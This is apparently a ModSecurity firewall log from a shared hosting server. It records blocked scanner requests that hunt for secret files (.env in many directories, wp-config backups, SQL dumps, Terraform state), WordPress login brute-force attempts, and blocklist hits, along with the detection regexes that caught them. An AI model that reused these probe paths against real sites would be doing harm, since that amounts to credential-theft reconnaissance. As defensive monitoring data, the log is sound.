[Tue May 26 14:49:15.693142 2026] [security2:error] [pid 648203:tid 648370] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlk7EQDDtxJNiDrdTk1wAAAKo"]
[Tue May 26 14:49:15.958474 2026] [security2:error] [pid 648203:tid 648356] [client 195.178.110.199:56276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stripe/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTk7QAAAJw"]
[Tue May 26 14:49:15.997637 2026] [security2:error] [pid 648203:tid 648402] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v1/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTk9gAAAMo"]
[Tue May 26 14:49:16.023225 2026] [security2:error] [pid 648203:tid 648460] [client 195.178.110.199:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v2/.env"] [unique_id "ahVllLEQDDtxJNiDrdTk-AAAAQQ"]
[Tue May 26 14:49:16.023820 2026] [security2:error] [pid 648203:tid 648454] [client 195.178.110.199:56274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v3/.env"] [unique_id "ahVllLEQDDtxJNiDrdTk-QAAAP4"]
[Tue May 26 14:49:16.447406 2026] [security2:error] [pid 648203:tid 648425] [client 209.50.168.133:13957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlk7EQDDtxJNiDrdTkuwAAAOE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:16.457860 2026] [security2:error] [pid 648203:tid 648399] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlk7EQDDtxJNiDrdTk7AAAAMc"]
[Tue May 26 14:49:16.459182 2026] [security2:error] [pid 648203:tid 648421] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlk7EQDDtxJNiDrdTk9AAAAN0"]
[Tue May 26 14:49:16.800016 2026] [security2:error] [pid 648203:tid 648369] [client 195.178.110.199:56168] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlLgAAAKk"]
[Tue May 26 14:49:16.826464 2026] [security2:error] [pid 648203:tid 648426] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/html/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlMQAAAOI"]
[Tue May 26 14:49:16.844873 2026] [security2:error] [pid 648203:tid 648377] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/website/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlMwAAALE"]
[Tue May 26 14:49:16.951611 2026] [security2:error] [pid 648203:tid 648450] [client 195.178.110.199:56252] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/web/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlNgAAAPo"]
[Tue May 26 14:49:16.953220 2026] [security2:error] [pid 648203:tid 648341] [client 195.178.110.199:56168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php"] [unique_id "ahVllLEQDDtxJNiDrdTlOAAAAI0"]
[Tue May 26 14:49:16.959688 2026] [security2:error] [pid 648203:tid 648408] [client 195.178.110.199:56274] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.bak"] [unique_id "ahVllLEQDDtxJNiDrdTlOgAAANA"]
[Tue May 26 14:49:16.959866 2026] [security2:error] [pid 648203:tid 648460] [client 195.178.110.199:56196] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.new"] [unique_id "ahVllLEQDDtxJNiDrdTlOwAAAQQ"]
[Tue May 26 14:49:16.973376 2026] [security2:error] [pid 648203:tid 648447] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.old"] [unique_id "ahVllLEQDDtxJNiDrdTlPQAAAPc"]
[Tue May 26 14:49:17.265046 2026] [security2:error] [pid 648203:tid 648402] [client 69.48.202.178:62629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVllbEQDDtxJNiDrdTlQQAAAMo"], referer: https://www.cagmedya.com/erzurum-web-tasarim/
[Tue May 26 14:49:17.319794 2026] [security2:error] [pid 648203:tid 648241] [remote 47.251.53.97:58030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVllbEQDDtxJNiDrdTlSwAAkiU"]
[Tue May 26 14:49:18.548124 2026] [security2:error] [pid 648203:tid 648440] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVllrEQDDtxJNiDrdTlggAAAPA"]
[Tue May 26 14:49:18.628264 2026] [security2:error] [pid 648203:tid 648404] [client 104.207.54.255:28197] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVllbEQDDtxJNiDrdTlWgAAAMw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:18.762895 2026] [security2:error] [pid 648203:tid 648457] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVllrEQDDtxJNiDrdTlfgAAAQE"]
[Tue May 26 14:49:19.064834 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.5:4558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/settings.php"] [unique_id "ahVll7EQDDtxJNiDrdTlmAAAALI"]
[Tue May 26 14:49:19.986013 2026] [security2:error] [pid 648203:tid 648454] [client 74.249.173.207:27849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVll7EQDDtxJNiDrdTlsQAAAP4"]
[Tue May 26 14:49:20.107555 2026] [security2:error] [pid 648203:tid 648451] [client 185.191.171.9:18892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahVlmLEQDDtxJNiDrdTlswAAAPs"]
[Tue May 26 14:49:20.107719 2026] [security2:error] [pid 648203:tid 648451] [client 185.191.171.9:18892] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahVlmLEQDDtxJNiDrdTlswAAAPs"]
[Tue May 26 14:49:20.768681 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.5:48482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php"] [unique_id "ahVlmLEQDDtxJNiDrdTlzQAAAL4"]
[Tue May 26 14:49:20.872178 2026] [security2:error] [pid 648203:tid 648444] [client 209.50.171.15:44027] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVll7EQDDtxJNiDrdTlqQAAAPQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:21.265581 2026] [security2:error] [pid 648203:tid 648407] [client 114.119.156.126:54321] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/chocolate-mauris-sodales/"] [unique_id "ahVlmbEQDDtxJNiDrdTl5gAAAM8"], referer: http://haddingtonwines.com/product-category/gift-items-chocolates/page/2
[Tue May 26 14:49:21.676450 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlmbEQDDtxJNiDrdTl5QAAAM4"]
[Tue May 26 14:49:22.804649 2026] [core:error] [pid 648203:tid 648405] [client 5.255.231.2:57914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:49:22.804667 2026] [core:error] [pid 648203:tid 648405] [client 5.255.231.2:57914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:49:23.057308 2026] [security2:error] [pid 648203:tid 648447] [client 104.207.63.32:32907] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlmbEQDDtxJNiDrdTmAAAAAPc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:23.073969 2026] [security2:error] [pid 648203:tid 648352] [client 64.89.163.250:57721] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahVlm7EQDDtxJNiDrdTmJAAAAJg"]
[Tue May 26 14:49:23.839735 2026] [security2:error] [pid 648203:tid 648353] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlm7EQDDtxJNiDrdTmLwAAAJk"]
[Tue May 26 14:49:25.190592 2026] [security2:error] [pid 648203:tid 648445] [client 45.3.32.46:20845] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlnLEQDDtxJNiDrdTmPwAAAPU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:26.015361 2026] [security2:error] [pid 648203:tid 648339] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlnbEQDDtxJNiDrdTmZgAAAIs"]
[Tue May 26 14:49:26.608893 2026] [security2:error] [pid 648203:tid 648288] [remote 111.229.141.137:56522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVlnrEQDDtxJNiDrdTmfQAA61Q"]
[Tue May 26 14:49:27.383282 2026] [security2:error] [pid 648203:tid 648389] [client 45.3.36.80:64483] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlnrEQDDtxJNiDrdTmewAAAL0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:28.310430 2026] [security2:error] [pid 648203:tid 648454] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVln7EQDDtxJNiDrdTmqgAAAP4"]
[Tue May 26 14:49:29.567220 2026] [security2:error] [pid 648203:tid 648377] [client 104.207.52.181:58993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVloLEQDDtxJNiDrdTmuAAAALE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:29.647716 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.5:48486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/config.php.bak"] [unique_id "ahVlobEQDDtxJNiDrdTm2QAAANk"]
[Tue May 26 14:49:30.464317 2026] [security2:error] [pid 648203:tid 648371] [client 176.65.139.232:62568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wpdev.wrapmachines.com"] [uri "/.env"] [unique_id "ahVlorEQDDtxJNiDrdTm8gAAAKs"]
[Tue May 26 14:49:30.503030 2026] [security2:error] [pid 648203:tid 648346] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlorEQDDtxJNiDrdTm7AAAAJI"]
[Tue May 26 14:49:31.192803 2026] [security2:error] [pid 648203:tid 648399] [client 14.226.13.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlorEQDDtxJNiDrdTm_wAAAMc"]
[Tue May 26 14:49:31.631689 2026] [security2:error] [pid 648203:tid 648312] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVlo7EQDDtxJNiDrdTnKwAAyGw"]
[Tue May 26 14:49:31.798910 2026] [security2:error] [pid 648203:tid 648383] [client 216.26.244.92:27951] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlorEQDDtxJNiDrdTm-AAAALc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:32.506434 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnOQAAANA"]
[Tue May 26 14:49:32.506984 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnOwAAAOs"]
[Tue May 26 14:49:32.509420 2026] [security2:error] [pid 648203:tid 648305] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend/.env"] [unique_id "ahVlo7EQDDtxJNiDrdTnVgAAyGU"]
[Tue May 26 14:49:32.510228 2026] [security2:error] [pid 648203:tid 648305] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/.env"] [unique_id "ahVlo7EQDDtxJNiDrdTnWQAAyGU"]
[Tue May 26 14:49:32.510545 2026] [security2:error] [pid 648203:tid 648316] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.leakyleaks.moes-art.com"] [uri "/*update.cgi*"] [unique_id "ahVlo7EQDDtxJNiDrdTnUQAAyHA"]
[Tue May 26 14:49:32.538446 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnNwAAANc"]
[Tue May 26 14:49:32.539983 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnPQAAAN0"]
[Tue May 26 14:49:32.552780 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnQAAAyGk"]
[Tue May 26 14:49:32.584580 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnZgAAAMI"]
